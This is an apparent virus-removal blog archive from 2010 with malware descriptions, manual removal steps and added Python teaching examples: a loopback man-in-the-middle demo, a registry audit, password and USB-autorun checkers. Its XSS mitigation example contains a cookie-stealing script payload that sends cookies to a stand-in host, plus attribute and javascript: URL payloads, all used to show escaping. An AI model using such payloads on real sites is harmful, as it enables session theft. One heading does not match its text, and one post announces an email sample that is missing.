Expert Virus Removal Services and Technical advice.

We are Providing Computer users with Expert Virus Removal Services and Technical Advice.


December 31, 2010

Man in the Middle and Redirection Attacks

We used to play a game in which two people throw a ball to each other while a third person in the middle tries to intercept it; whoever loses the ball swaps places with the interceptor.

In the cyber world the game of keep-away gets a new twist: the two players have no idea the man in the middle (MITM) exists. It works like this:
  • Computer A initiates a conversation with Computer B
  • Computer C intercepts that attempt and relays the request to Computer B
  • Computer B responds, Computer C intercepts the response and returns it to Computer A
While Computer C sits between A and B it can read the traffic, change the data in either direction, or redirect the conversation to an entirely different destination, while Computer A still believes it is talking to Computer B. This only works when the channel is unauthenticated: with TLS and proper certificate validation, C cannot impersonate B or alter the traffic without the client noticing.
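The A, B and C exchange above, as an added example that is not code from the original post: three tiny TCP endpoints on the loopback interface, where C rewrites a "transfer" message on the way to B and rewrites B's receipt on the way back so that A never sees the change. The message format, the port wiring and the amount-rewriting rules are assumptions made up for the demonstration.

```python
import socket
import threading

# Added example, not code from the original post. Everything runs on 127.0.0.1 with
# ephemeral ports; the TRANSFER message format and the rewriting rules are assumptions
# made up for the demonstration.

def _listen():
    """Bind a TCP listener on an ephemeral loopback port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv

def _serve_once(listener, handler):
    """Accept exactly one connection, run handler on it, then close the listener."""
    conn, _ = listener.accept()
    with conn:
        handler(conn)
    listener.close()

def start_computer_b(received):
    """Computer B: the honest server. It records what arrives and answers with a receipt
    that echoes the request it actually processed."""
    listener = _listen()
    def handler(conn):
        request = conn.recv(4096)
        received.append(request)
        conn.sendall(b"RECEIPT " + request)
    threading.Thread(target=_serve_once, args=(listener, handler), daemon=True).start()
    return listener.getsockname()[1]

def start_computer_c(b_port, forward_rule, reverse_rule):
    """Computer C: the man in the middle. A connects here believing it is B. C opens its
    own connection to B, rewrites the request on the way in and the reply on the way out,
    so A sees a consistent (but false) picture."""
    listener = _listen()
    def handler(conn):
        request = conn.recv(4096)
        with socket.create_connection(("127.0.0.1", b_port), timeout=5) as upstream:
            upstream.sendall(forward_rule(request))
            reply = upstream.recv(4096)
        conn.sendall(reverse_rule(reply))
    threading.Thread(target=_serve_once, args=(listener, handler), daemon=True).start()
    return listener.getsockname()[1]

def computer_a(port, message):
    """Computer A: the client. Sends one message and returns whatever reply it gets."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as sock:
        sock.sendall(message)
        return sock.recv(4096)

def run_demo():
    """Returns (what B really received, what A was shown)."""
    received_by_b = []
    b_port = start_computer_b(received_by_b)
    c_port = start_computer_c(
        b_port,
        forward_rule=lambda m: m.replace(b"AMOUNT=100", b"AMOUNT=900"),
        reverse_rule=lambda r: r.replace(b"AMOUNT=900", b"AMOUNT=100"),
    )
    # A has been pointed at C (ARP spoofing, DNS tampering, a hosts-file edit, ...);
    # from A's point of view c_port is simply "B".
    shown_to_a = computer_a(c_port, b"TRANSFER AMOUNT=100 TO=alice")
    return received_by_b[0], shown_to_a

if __name__ == "__main__":
    seen_by_b, seen_by_a = run_demo()
    print("B processed:", seen_by_b)
    print("A was shown:", seen_by_a)
```

B processes a transfer of 900 while A is shown a receipt for 100: the same trick a banking trojan plays when it rewrites the balance page so the victim does not notice the fraudulent transfer. Replace the plain sockets with a TLS connection whose certificate A verifies and C can neither read nor rewrite the bytes.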


Key Loggers

Keystroke logging is the practice of recording the keys typed on a keyboard without the user knowing that they are being monitored. In its simplest form, a keylogger trojan is malicious, surreptitious software that records your keystrokes to a file and sends that file to a remote attacker. Keyloggers are classified as software keyloggers and hardware keyloggers.

December 30, 2010

Unconquered Zeus Threat

ZeuS is a well-known banking Trojan horse program, also classed as crimeware. It steals data from infected computers via the web browser and Windows Protected Storage. Once a computer is infected it sends the stolen data to a bot command and control (C&C) server, where the data is stored.

The US FBI, the Secret Service and various New York agencies have issued a joint cyber-security advisory warning of the threat posed by the Zeus botnet specifically and of the wire-fraud risk from keylogger trojans in general. Zeus combines keylogger capabilities with man-in-the-middle (or man-in-the-browser) attacks to steal online banking credentials.

How to remove Worm_Lamin.AC

First, prevention is better than cure: it is far easier to stay clean than to clean up after the system has been infected. Be careful about clicking unknown links, enable a pop-up blocker, turn on the firewall and keep the anti-virus updated; these are the basics for safeguarding the system.

Manual removal of the worm:

Step 1: Turn System Restore off, so that infected files are not preserved in restore points.
Step 2: End the worm's processes from the Processes tab of Task Manager (or Process Explorer), note the image path of each one, and delete those files.
Step 3: Sometimes the files found from the Processes tab or Process Explorer cannot be deleted while the worm is running; in that case restart in Safe Mode and try to remove them again.
Step 4: Re-enable Registry Editor if the worm has disabled it.
Step 5: Delete the following registry values:


  • In HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    • Shell = %Program Files%\Microsoft Office\OFFICE11\WINWORD.EXE
  • In HKEY_CLASSES_ROOT\exefile
    • NeverShowExt =
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
    • EnableLUA = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\{Application name}
    • Debugger = cmd.exe /c del    
      
  • Delete the registry keys 
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\
      • Svc
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\
      • FWCFG
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
      • WinDefend
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center              
     
  • Restore these modified registry values to their defaults (the Type values are hexadecimal, i.e. 0x20):
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    From: SuperHidden = 0
    To: SuperHidden = 1
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc
    From: Type = 4
    To: Type = 20
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess
    From: Type = 4
    To: Type = 20
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv
    From: Type = 4
    To: Type = 20
  • If the same service paths appear under another control set (CurrentControlSet is only a link to one of the ControlSet00n keys), change the value from 4 to 20 there as well.

Search for and delete the following files dropped in %Program Files%\Microsoft Office\OFFICE11\:
control.ini
Drvics32.dll
hjwgsd.dll
jwiegh.dll
PUB60SP.mrc
ruimsbbe.dll
smss.exe
yofc.dll
remote.ini


After doing this, scan the computer with a good, updated anti-virus program.
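The registry and file checks from the removal steps above, gathered into one script as an added example (not part of the original write-up). It only reports what it finds, so each finding can be looked at before anything is deleted or restored. The short hive names HKCU/HKLM/HKCR and the snapshot layout (a dict of (key, value name) to data) are conventions of this script; the live-registry reader uses Python's standard winreg module and therefore runs on the Windows machine being cleaned.

```python
import os
import sys

# Added example, not part of the original write-up. It reads the indicators listed in
# the removal steps above and reports which are present, without changing anything.
# Hive names HKCU/HKLM/HKCR and the snapshot layout, a dict of (key, value_name) ->
# data, are conventions of this script only.

IFEO = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Values the worm creates; a match means "delete this value".
WORM_SET = {
    (r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell"):
        r"%Program Files%\Microsoft Office\OFFICE11\WINWORD.EXE",
    (r"HKCR\exefile", "NeverShowExt"): "",
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", "EnableLUA"): 0,
}

# Values the worm changes: (what it sets, the clean default). 0x20 is the write-up's
# "Type = 20" read as hexadecimal, the normal value for these shared-process services.
WORM_CHANGED = {
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "SuperHidden"): (0, 1),
    (r"HKLM\SYSTEM\CurrentControlSet\Services\wscsvc", "Type"): (4, 0x20),
    (r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess", "Type"): (4, 0x20),
    (r"HKLM\SYSTEM\CurrentControlSet\Services\wuauserv", "Type"): (4, 0x20),
}

# Files the worm drops under %Program Files%\Microsoft Office\OFFICE11. WINWORD.EXE is
# left out on purpose: it is also the real Word binary's name, so its presence proves
# nothing by itself; check that file's signature or hash instead.
DROPPED = ["control.ini", "Drvics32.dll", "hjwgsd.dll", "jwiegh.dll", "PUB60SP.mrc",
           "ruimsbbe.dll", "smss.exe", "yofc.dll", "remote.ini", "services.exe"]

def audit(snapshot):
    """Compare a registry snapshot with the indicators. Returns a list of
    (action, key, value_name, current, wanted) tuples; an empty list means clean."""
    findings = []
    for (key, name), bad in WORM_SET.items():
        cur = snapshot.get((key, name))
        if cur is None:
            continue
        cur_s, bad_s = str(cur).lower(), str(bad).lower()
        # A live Shell value may hold the expanded path rather than the %Program Files%
        # form, and anything other than explorer.exe there is suspect anyway.
        if cur_s == bad_s or (name == "Shell" and cur_s != "explorer.exe"):
            findings.append(("delete", key, name, cur, None))
    for (key, name), (bad, good) in WORM_CHANGED.items():
        if snapshot.get((key, name)) == bad:
            findings.append(("restore", key, name, bad, good))
    # The Debugger hijack can sit under any application name, so scan every IFEO subkey.
    for (key, name), cur in snapshot.items():
        if (key.startswith(IFEO + "\\") and name == "Debugger"
                and str(cur).lower().startswith("cmd.exe /c del")):
            findings.append(("delete", key, name, cur, None))
    return findings

def find_dropped_files(office11_dir):
    """Return the dropped-file names that exist in the given OFFICE11 directory."""
    return [f for f in DROPPED if os.path.exists(os.path.join(office11_dir, f))]

def read_live_registry():
    """Windows only: build a snapshot containing exactly the values audit() inspects."""
    import winreg  # standard library, importable only on Windows
    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE,
             "HKCR": winreg.HKEY_CLASSES_ROOT}

    def get(key, name):
        hive, _, sub = key.partition("\\")
        try:
            with winreg.OpenKey(hives[hive], sub) as k:
                return winreg.QueryValueEx(k, name)[0]
        except OSError:          # key or value absent
            return None

    snap = {k: get(*k) for k in list(WORM_SET) + list(WORM_CHANGED)}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IFEO.partition("\\")[2]) as k:
        i = 0
        while True:
            try:
                app = winreg.EnumKey(k, i)
            except OSError:      # no more subkeys
                break
            i += 1
            snap[(IFEO + "\\" + app, "Debugger")] = get(IFEO + "\\" + app, "Debugger")
    return snap

if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on the Windows machine being cleaned")
    for action, key, name, cur, wanted in audit(read_live_registry()):
        tail = f" -> {wanted!r}" if wanted is not None else ""
        print(f"{action:7} {key}\\{name} = {cur!r}{tail}")
    office11 = os.path.join(os.environ.get("ProgramFiles", r"C:\Program Files"),
                            "Microsoft Office", "OFFICE11")
    for f in find_dropped_files(office11):
        print("dropped  " + os.path.join(office11, f))
```

Run it once before cleaning to get the list, and again afterwards: an empty audit and no dropped files left is the check that the manual steps were all carried out.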

Worm_Lamin.AC

This worm propagates via online instant-messaging applications such as Yahoo Messenger, Google Talk, MSN Messenger and Digsby.


Effects:

  • Deletes registry keys related to anti-virus and security applications, so the anti-virus stops working properly and the system is left at risk
  • Disables Security Center functions such as the firewall and security updates
  • Disables the Internet Connection Sharing service, which breaks connection sharing
  • Sends a copy of its download link in instant messages
It drops the following files on the system:

  • %Program Files%\Microsoft Office\OFFICE11\services.exe
  • %Program Files%\Microsoft Office\OFFICE11\WINWORD.EXE
  • %User Startup%\Adobe Gamma Loader.com

  1. It also places these component files in the same Program Files folder: Drvics32.dll, hjwgsd.dll, jwiegh.dll, PUB60SP.mrc, remote.ini, yofc.dll, ruimsbbe.dll and smss.exe, and creates an autostart entry in the registry (the Winlogon Shell value above) pointing at the WINWORD.EXE it dropped, so the worm is started in place of the normal shell.
  2. It also deletes the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot, so the system can no longer boot into Safe Mode, sets the Explorer SuperHidden value to 0, and changes the Type values of the SharedAccess and other service-related registry entries to 4. If Safe Mode is gone, the SafeBoot key has to be restored (exported from a clean machine running the same Windows version) before the Safe Mode step of the removal procedure will work.
  3. It also pings many harmful sites from the command prompt.
  4. The spam messages it sends are predetermined, listed in HJWGSD.DLL, and contain the link http://bukuger{BLOCKED}.hared.com. Copies of the malware may be downloaded from this site, which is currently inaccessible.
So be careful when clicking links in any instant-messenger message.

Mitigating Cross Site Scripting

Attackers inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application so that a user's browser runs it, in order to gather data from the user or to do other damage on the victim's PC: DNS poisoning, changes to system security settings, cookie theft, adware and so on.

XSS holes allow JavaScript insertion, which by itself gives only limited execution: the script runs inside the browser, with the privileges of the vulnerable site. If the attacker also exploits a browser flaw (a browser hole), it may become possible to execute commands on the client side; if command execution is possible at all, it is only ever on the client side. In simple terms, XSS holes can be used as a stepping stone to exploit other holes that may exist in your browser.

Cross Site Scripting (XSS)

It is a vulnerability in a web application that lets an attacker inject malicious scripts into pages viewed by other users. The impact ranges from theft and misuse of user details down to very small issues such as being redirected to other sites. The fix belongs on the server side, encoding user-supplied data for the context in which it is output; an Internet security program or browser filter on the client can only partly cover for a site that does not do this.
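The vulnerable output beside its hardened form, as an added example that is not code from the original post: a comment template rendered once by plain string concatenation and once with context-specific encoding, driven by three constructed attacker strings (one for a text node, one for an attribute value, one for a link). The template, field names and attacker payloads are all assumptions made up for the demonstration.

```python
import html
from urllib.parse import urlsplit

# Added example, not code from the original post. The comment template, the field names
# and the attacker strings are constructed for the demonstration; the encoding rules are
# the standard ones (HTML-encode for text and attribute contexts, whitelist the URL scheme).

def render_comment_vulnerable(author, site, text):
    """Builds the page by string concatenation: whatever the user typed is emitted as markup."""
    return ('<div class="comment"><a href="' + site + '">' + author + '</a>'
            '<p>' + text + '</p></div>')

def safe_href(url):
    """Allow only http(s) links; javascript:, data: and the rest collapse to a harmless '#'."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in ("http", "https") else "#"

def render_comment_safe(author, site, text):
    """Same template, but each value is encoded for the context it lands in: quote=True so
    a '"' cannot close the href attribute, html.escape for the two text nodes, and a scheme
    check so the link itself cannot carry script."""
    return ('<div class="comment"><a href="' + html.escape(safe_href(site), quote=True) + '">'
            + html.escape(author) + '</a><p>' + html.escape(text) + '</p></div>')

def contains_active_content(markup):
    """Crude check used only to show the difference: a live <script> tag, an event-handler
    attribute that escaped its quoting, or a javascript: link."""
    lowered = markup.lower()
    return ("<script" in lowered or ' onmouseover="' in lowered
            or 'href="javascript:' in lowered)

# Three constructed attacker inputs, one per injection context.
ATTACKS = {
    "text node": ("bob", "http://example.org",
                  "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"),
    "attribute": ("bob", 'http://example.org" onmouseover="alert(document.domain)', "nice post"),
    "url":       ("bob", "javascript:alert(document.cookie)", "nice post"),
}

def compare_renderers():
    """Returns {context: (vulnerable_output_is_live, hardened_output_is_live)}."""
    return {ctx: (contains_active_content(render_comment_vulnerable(*args)),
                  contains_active_content(render_comment_safe(*args)))
            for ctx, args in ATTACKS.items()}

if __name__ == "__main__":
    for ctx, (vuln, safe) in compare_renderers().items():
        print(f"{ctx:10} vulnerable={vuln}  hardened={safe}")
    print(render_comment_safe(*ATTACKS["attribute"]))
```

The point of the three cases is that one escaping routine is not enough: the text-node payload is stopped by html.escape alone, the attribute payload needs quote=True as well, and the link payload contains no HTML metacharacters at all and can only be stopped by refusing the scheme. The cookie-theft payload in the first case is additionally blunted by marking the session cookie HttpOnly, which keeps document.cookie from exposing it.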

December 29, 2010

Email-Worm.Zhelatin

Anti-Virus8 is a typical rogue anti-virus: it installs itself on the computer, presents a fake scan claiming that there are many threats on the machine, and asks you to purchase a licence to remove them. It looks similar to AVG Anti-Virus, which is how it gets past many people.

Brontock

This worm arrives as an email attachment named Kangen.exe. When executed it opens the documents folder and copies itself into the user profile, adding an entry under the current-user section of the registry. The email it arrives in looks like the following:

Browser Modifier

This is a kind of adware that attacks the browser. It keeps showing pop-ups and advertisements that carry other, hidden infections. It blocks certain other advertisements and changes the Internet Explorer search settings. The result is unwanted pages or browser redirects: when you try to go to a particular website you land on a different one.


Virus named Java Downloader


TrojanDownloader:Java/OpenConnection.IT is the detection for a malicious Java applet that attempts to download and execute files from a remote web site. It often works together with Exploit:Java/CVE-2010-0094, which exploits a vulnerability in the Java Runtime Environment (JRE).






December 28, 2010

Passwords that can be Cracked Easily

Passwords are the key to securing our email and bank accounts. A good password combines small and capital letters, numbers and special symbols, and is long enough that it cannot be brute-forced; just as important, it must not be a dictionary word with a few obvious substitutions, because that is the first thing cracking tools try. Passwords are what stand between crimeware, spyware and the like and our computers, emails and bank accounts.
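A small checker, added here as an example that is not from the original post, showing why "mix the character classes" on its own is not the whole rule: it estimates the brute-force search space from length and alphabet, but first reduces the password the way a rule-based cracker does (lower-case, strip the trailing digits and symbols, undo leet-speak) and looks it up in a wordlist. The COMMON set is a constructed stand-in for the multi-million-entry wordlists real tools use, and the 64-bit threshold is this script's own rule of thumb.

```python
import math
import string

# Added example, not part of the original post. COMMON is a constructed stand-in for the
# multi-million-entry wordlists real cracking tools use; the 64-bit threshold is this
# script's own rule of thumb for what a blind brute force can reach.

COMMON = {"password", "123456", "qwerty", "letmein", "welcome", "abc123",
          "iloveyou", "monkey", "dragon", "football"}

# Substitutions crackers undo first ("leet" rules): @->a $->s 0->o 1->l 3->e 4->a 5->s 7->t !->i
LEET = str.maketrans("@$013457!", "asoleasti")

def charset_size(pw):
    """Size of the smallest standard alphabet that contains every character of the password."""
    size = 0
    if any(c in string.ascii_lowercase for c in pw):
        size += 26
    if any(c in string.ascii_uppercase for c in pw):
        size += 26
    if any(c in string.digits for c in pw):
        size += 10
    if any(c in string.punctuation for c in pw):
        size += len(string.punctuation)   # the 32 printable ASCII symbols
    return size

def brute_force_bits(pw):
    """log2 of the search space a blind brute force faces: length * log2(alphabet)."""
    return len(pw) * math.log2(charset_size(pw)) if pw else 0.0

def normalise(pw):
    """Reduce a password the way a rule-based cracker does: lower-case it, drop the
    trailing digits/symbols people append, then undo leet-speak."""
    return pw.lower().rstrip(string.digits + string.punctuation).translate(LEET)

def assess(pw):
    """Returns (verdict, bits). The wordlist check comes first because a password that
    reduces to a dictionary word falls long before its brute-force bits matter."""
    bits = round(brute_force_bits(pw), 1)
    if pw.lower() in COMMON or normalise(pw) in COMMON:
        return "weak: wordlist", bits
    if bits < 64:
        return "weak: brute-forceable", bits
    return "ok", bits

if __name__ == "__main__":
    for candidate in ("P@ssw0rd1!", "Abc123!", "Tr0ub4dor&3", "the-quick-brown-fox-jumps"):
        verdict, bits = assess(candidate)
        print(f"{candidate:28} {bits:6.1f} bits  {verdict}")
```

"P@ssw0rd1!" uses all four character classes and still fails, because it is "password" with the substitutions every wordlist rule set already knows; the long lower-case phrase passes on length alone.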

Sality Virus

Sality is a family of file-infecting viruses that spread by infecting executable files. It also runs an autorun worm component that lets it spread to any removable or discoverable drive, and includes a downloader trojan component that installs additional malware from the web. So it is a combination of several infections bundled together to damage the computer's software.

It infects executable files on local, removable and remote shared drives. The virus also joins a peer-to-peer (P2P) botnet from which it receives URLs of additional files to download. It then attempts to disable security software on the computer, and it has key-logging functionality. Sality generally drops a .cmd, .pif or .exe file in the root of discoverable or removable drives, along with an autorun.inf file containing instructions to load the dropped file(s) when the drive is accessed. Updates to the malware it drops are fed through decentralised lists of HTTP URLs.


Removing Sality Virus: 

  • Take a registry backup and create a restore point to be on the safe side.
  • Unregister the file from the command prompt: regsvr32 /u vcmgcd32.dll
  • Remove the file vcmgcd32.dll, locating it with the search option.
  • Remove the "Virus.Sality.U" components: BwUnin-6.1.4.36-8876480L.exe, syslib32.dll, sysdll.dll, oledsp32.dll and all the files associated with them.

This removes the Virus.Sality.U components from the computer. Because Sality is a file infector, the executables it has already modified are still infected after these steps: they have to be disinfected with a vendor's Sality removal tool or replaced from clean copies, and every other drive the machine has touched should be checked for the autorun.inf and dropped files described above.

December 25, 2010

SYMPTOMS OF SALITY VIRUS

 
The Sality virus is one of a kind: very dangerous and highly infectious. It attacks system components such as Windows Task Manager and the registry. The registry is the part we need to take most care of, because registry values are like the wheels of a vehicle: if they get corrupted we may not be able to use the computer, just as we cannot use a vehicle whose tyres have gone flat.

Computer Virus Infection Strategies

A virus is a program written so that it can copy itself, and it may be capable of completely disabling a computer. A true virus spreads from one computer to another by infecting files on a host computer that it can reach, for example over a network.



"Here you have" Virus

''Here You Have'' is one of the most widely spread viruses on the Internet at the moment. It arrives as an email in the inbox with a subject line such as "Here you have" or "Just for you". It is also known as W32/VBMania@MM.


December 24, 2010

REMOVING VIRUS FROM PENDRIVES




Preventing the virus from entering the PC:
There are some common things to take note of while using a pen drive / flash drive / thumb drive. People use flash drives to copy data; often the data is documents, executable files, movies and so on.

  • Copy the files you need directly rather than browsing through the drive's folders, because the viruses found on portable drives mostly target folders. That is the first thing to keep in mind.
  • Secondly, when opening the PD (portable drive) do not let AutoRun open it. First scan the PD with a good anti-virus before opening it.
  • If the scan finds infections, fix them. If they are not fixed, or are skipped or excluded from the scan, the PD must not be opened as usual.


REMOVING IT:

The command prompt can be used to remove a virus from a pen drive with a few familiar, basic CMD commands.

  • Open the command prompt via Start > Run, or by pressing the Windows logo key + R, and type cmd. Then type the drive letter of the pen drive followed by a colon (for example E:) to switch to it.
  • Then type DIR /A. Check every file and folder in the list, especially for AUTORUN.INF, RECYCLER and any .exe file you do not expect to be there.
  • Type ATTRIB *.* -S -R -H to remove the system, read-only and hidden attributes from all files, so that they become visible and deletable.
  • Then delete the suspect files one at a time with DEL FILENAME.EXT.
  • Repeat this process for every folder on the drive. AUTORUN.INF in the root is what makes Windows run the dropped executable, so make sure it is gone.

This removes the dropped files from the pen drive; scan it afterwards with an updated anti-virus, because a hand check can miss a file the worm has hidden under a plausible name.

Note: never open files on a pen drive directly from Windows Explorer after it has been used in an Internet cafe, because those machines are among the most common sources of infection.
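The DIR /A and ATTRIB checks above done programmatically, as an added example that is not from the original post: the script walks the drive, reports hidden or system files, RECYCLER-style folders and stray program files, and parses autorun.inf to show which executable Windows would have run. It reports only; deleting is left to the reader once each finding has been looked at. The sample stick it builds when run without arguments is a constructed directory, and the hidden/system attribute test relies on st_file_attributes, which Python exposes on Windows only.

```python
import os
import stat
import tempfile

# Added example, not from the original post. It performs the DIR /A and ATTRIB checks
# programmatically and only reports; deleting is left to the reader. The hidden/system
# attribute test relies on st_file_attributes, which Python exposes on Windows only;
# elsewhere that check silently reports nothing.

HIDDEN = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2)
SYSTEM = getattr(stat, "FILE_ATTRIBUTE_SYSTEM", 0x4)
EXECUTABLE_EXT = (".exe", ".com", ".scr", ".pif", ".cmd", ".bat", ".vbs")

def parse_autorun(text):
    """Return the targets an autorun.inf would run: open=, shellexecute= and
    shell\\<verb>\\command= lines inside the [autorun] section (icon= and label= are ignored)."""
    targets, in_autorun = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line.lower() == "[autorun]"
            continue
        if not in_autorun or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        if key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command")):
            targets.append(value.strip())
    return targets

def is_hidden_or_system(path):
    """True when the Windows hidden or system attribute is set (what ATTRIB -S -H clears)."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & (HIDDEN | SYSTEM))

def scan_removable(root):
    """Walk the drive and return (kind, path, detail) findings for the things the
    manual procedure tells you to look for."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            if name.lower() in ("recycler", "recycled"):
                findings.append(("suspicious dir", os.path.join(dirpath, name),
                                 "recycle-bin folder on removable media"))
        for name in filenames:
            path, lower = os.path.join(dirpath, name), name.lower()
            if lower == "autorun.inf":
                with open(path, "r", errors="replace") as fh:
                    for target in parse_autorun(fh.read()):
                        findings.append(("autorun target", path, target))
            if lower.endswith(EXECUTABLE_EXT):
                findings.append(("executable", path, "program file on a data stick"))
            if is_hidden_or_system(path):
                findings.append(("hidden/system", path, "attribute set"))
    return findings

def build_sample_stick():
    """Constructed sample: a throw-away directory laid out like an infected stick."""
    root = tempfile.mkdtemp(prefix="stick_")
    os.makedirs(os.path.join(root, "RECYCLER"))
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write("[autorun]\n"
                 "open=RECYCLER\\svchost.exe\n"
                 "shell\\open\\command=RECYCLER\\svchost.exe\n"
                 "icon=%SystemRoot%\\system32\\shell32.dll,4\n")
    open(os.path.join(root, "RECYCLER", "svchost.exe"), "wb").close()
    open(os.path.join(root, "report.docx"), "wb").close()
    return root

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_stick()   # e.g. E:\
    for kind, path, detail in scan_removable(root):
        print(f"{kind:15} {path}  ({detail})")
```

Pass the drive letter (E:\ and so on) as the only argument to scan a real stick; the autorun targets it prints are the first files to delete, since they are what the worm relies on to start when the drive is plugged in.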

REMOVING ROOTKITS MANUALLY

The term rootkit describes the mechanisms and techniques by which malware, including viruses, spyware and trojans, attempts to hide its presence from spyware blockers, anti-virus and system management utilities. There are several rootkit classifications, depending on whether the malware survives a reboot and whether it executes in user mode or kernel mode.

Uninstalling an Anti-virus using removal tools:

REMOVAL TOOLS:

Any anti-virus installs settings and files in different folders on the computer. So today we will learn how to uninstall an anti-virus using the uninstall utilities the different companies provide. Before that we need to know why such utilities are needed at all.
The reason for uninstalling an anti-virus with a tool is to make sure that no leftover files or registry entries remain, since those cause problems when another anti-virus is installed. If more than one anti-virus is present on the system they conflict with each other and none of them works properly.
So to protect the PC from infections and to have one, and only one, clean security application, use the removal tools to uninstall the old product.

Names of few tools to uninstall different security programs:

  • Norton removal tool
  • McAfee consumer product removal tool
  • Avast uninstall utility
  • Removal tool for Kaspersky products
  • Avg remover
  • Bit defender uninstall tool

These removal tools remove the installed anti-virus from the computer completely, which lets any other anti-virus program be installed without problems.

They work across the Windows versions in use: XP, Vista and Windows 7. Sometimes the toolbars and companion products that come with the full suite have to be removed as well, for example with the Panda Anti-Virus Firewall 2010 uninstall tool, or Norton Online Family and Norton Online Backup; these have to be uninstalled separately, either from Add or Remove Programs or with the product's own removal tool.

Virus in RFID

VIRUS THAT HAS INFECTED MAN:

A virus has recently been put on an RFID chip implanted in Dr Mark Gasson's left wrist; Dr Gasson, of the University of Reading, deliberately infected his own implant to demonstrate the risk, and gave an interview to BBC News about the experiment and its effects.
There are many things an RFID chip can do: it can talk to our mobile phone, open doors at the organisation we work for, and so on. If the chip we use to get access to machines is infected, there is a chance that the machines we present the chip to will be infected as well, just like mainstream computers.

RFID stands for Radio Frequency Identification. The chip is embedded in the human body the way it is already done for animals. It is set to be a revolution: in future everyone may carry an RFID chip holding their personal details, and it may replace other identity numbers to give an advanced tracking system.

The infected chip in Dr Gasson's wrist passed the virus on to the building-access machines that read it, which is exactly the question BBC News put to him: how readily do such devices infect the computers they touch? Medical implants are now exposed to viruses because implant technology has reached the point where the devices can communicate, store and manipulate data. So the technology has to keep pace with the new viruses that are invented daily and secure itself against them.

December 23, 2010

Bom Sabado Worm

Are you getting the GOOD SATURDAY worm?

Is your Orkut safe? Did your friends complain about scraps being sent to them from your account, with the name Bom Sabado, which means GOOD SATURDAY in Portuguese? If so, your Orkut account has been hit by this worm. It exploited a cross-site scripting flaw in the Orkut site to spread from account to account.

ANDROID FAKE PLAYER-VIRUS

Android Fake Player:

A new Trojan has been found on phones running the Android operating system; it is detected as an SMS Trojan. It works by sending premium-rate SMS messages, which is very costly for the victim, since every message it sends is billed to the phone's account. The application is about 13 KB, poses as a media player, and goes to work as soon as the user runs the fake player. At install time the user is asked to approve the permission to send SMS messages; once that is approved and the player is launched, the Trojan starts sending.

December 17, 2010

Installing Anti-Virus

Different anti-virus companies' products are compatible with Windows 7.
An anti-virus comes as a set-up file that installs the program. Before installing it, several things need to be checked, unchecked, disabled or enabled. Even uninstalling has to be done with the vendor's tool; otherwise the product is not removed completely and the leftovers in the registry cause problems later.

Things to look for in selecting an Anti-virus Program

Features of a Good Anti-Virus:

Things we need to look for,when we purchase an anti-virus are: 
  • Good scanning engine
  • Behavioral Scanning feature 
  • Resource friendly
  • Install and uninstall without any problems
  • No conflicts with other software
  • Boot level Scanning
  • Last but not least, User friendly and Operating system flexible
Look at the scanning engine: how deep it scans the computer, whether it scans system files, compressed files, etc., and which scanning options it offers (Quick Scan, Full Scan, Custom Scan).
Nowadays rootkit and malware scanning are built into the main scanning module, which saves buying additional protection software for those infections.

Another point to look for is the firewall. Internet security suites grew out of the firewall concept: a firewall monitors network traffic and lets us block or allow particular ports, which helps protect the computer from hackers.

Browser and email protection: vendors have extended their products with email-client and browser protection. Browser protection goes under names like Site Advisor, Safe Search, Identity Protection and so on. Email protection filters and deletes unwanted junk, including spam.
However, it is still our duty not to open mail from unknown senders, or mail containing links that lead to infections. Spammers always craft their messages to attract our attention.

Internet Security comes with parental control as well. It is a good tool to monitor kids and help them use the Internet safely. 

At the end of the day, whatever anti-virus we use, it is our responsibility to be careful about opening risky sites and to protect our programs, network and files with passwords. Last but not least, check compatibility with your operating system: a security program written for XP is not necessarily compatible with Vista. So take some time to look for these things in an anti-virus program before buying it.

December 15, 2010

Removing Fake Spywares Manually

